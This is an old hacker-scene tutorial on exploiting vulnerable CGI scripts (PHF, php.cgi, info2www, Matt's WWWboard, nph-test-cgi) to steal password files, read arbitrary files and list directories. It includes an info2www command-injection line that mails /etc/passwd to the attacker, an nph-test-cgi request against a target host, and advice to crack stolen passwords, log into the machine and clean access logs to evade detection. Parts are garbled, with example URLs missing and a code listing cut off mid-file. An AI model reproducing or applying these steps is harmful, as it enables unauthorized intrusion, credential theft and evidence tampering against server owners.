This is a great article on CGI and their exploits. Please excuse the grammmer but it is VERY good reading. Hitman did a great job. Keep it up.
by
Da Hitman (daemon@mac-addict.com)
www.neverness.net/MaCrack
**With special help from HardCoded†**
>--==--[Intro]--==--<
This text will primarily concern CGI ( Common Gateway Interface ) scripts/software and their many holes/bugs and how a hacker can exploit them to grab hold of the fabled passwd file and do other misc stuff
The most famous/outdated exploit in my opinion is the PHF(packet handler function) exploit. The PHF exploit is/was an hole in most servers that allowed u to access the passwd file without a login or pass and/or delete any file on the system. You would aquire the passwd file by adding a string to the URL in your bowser like this
Some foreign servers are still vulnerable to this exploit. But usually you will get a message saying
"The requested object does not exist on this server. The link you followed is either outdated, inaccurate,or the server has been instructed not to let you have it."
If u get a blinking message saying "You have been caught on Candid Camera!" don’t piss in yer pants they rarely ever report u. But if u get....
consider yerself lucky. You have the passwd file. Use MacCrac or another password cracker to try to “crack” it. If u do actually “crack” the passwd file and choose to login and hax0r the box then remember to audit the logs,especially the most important log
/usr/local/etc/httpd/logs/access_log file
and if it has it...
/www/logs
because it will have logged your phf usage.
u can also view any file on the system by typing in the broswer
and u might land yerself in jail if u do not be careful and realize that most admins with the PHF cgi know/been told of this old ass exploit. :)
--< PHP Exploit >--
The programs phpscan.c and phpget.c together exploit a hole in the php.cgi code which allows remote users to read ANY file on the system that the http daemon has access too. You use phpscan.c to scan from a list of hosts and phpget.c to retreive files from the host.
phpscan.c
---CUT-----
/*
phpscan.c : php.cgi vunerable server scanning program.
Basically a modified phf scanner, by Alhambra of The Guild.
The info2www CGI script changes GNU files to “info” files but doesn’t check
user-provided filenames before opening them thus allowing us to open the system’s files and execute shell commands.
ex;
$ REQUEST_METHOD=GET ./info2www '(../../../../../../../bin/mail jami </etc/passwd|)'
$
You have new mail.
$
oh jinkies!it just mailed us the passwd file! :)
--< Matt’s WWWboard script >--
Matt should stop making these scripts, really no joke. He is like handing away a timebomb to a sys admin. Lets take a look at one of his exploitable scripts. (lets not mention the textcounter.pl script for his sake.)
[WWWboard Script]
This script is very easily exploitable. By default you have ta put the passwd.txt file in the same directory as your wwwboard. So what does that mean?It means that itz sploitin time! Here’s how we do it
All we do know is add some stuff behind the encrypted passwd file. The things i am adding is just the User ID, Group ID, home dir, shell, etc. This is because we are gonna run a passwd cracker on it and since matt uses the same encrytpion scheme that is vulnerable to the brute force dictionary attack. (i told u he is a dumbass)
run the passwd cracker and walla u have the password! Now u have access to delete/edit files on the victim’s WWWboard!
--< NPH-TEST CGI >--
This script can be exploited to obtain a file listing of any directory on the server. Here’s an example how we would exploit this script.
http://www.target.com/cgi-bin/nph-test-cgi?/*
--==--[The Top 5 Exploitable CGI Scripts/Programs]--==--
I rounded up all the vulnerable cgi scripts/programs and decided which was my fave and the most popular(now or at the time) and i posted them down below. :)
Hopefully this small lame file gave u some information on each CGI program and how to exploit it. I rather have u to have some knowledge rather than running xCGI on a site and not knowing what the hell campas/php/webgais,etc is or does. ;D
if i left sumtin out or maybe missed an important exploit,KINDLY email me and tell me of da prob. ;)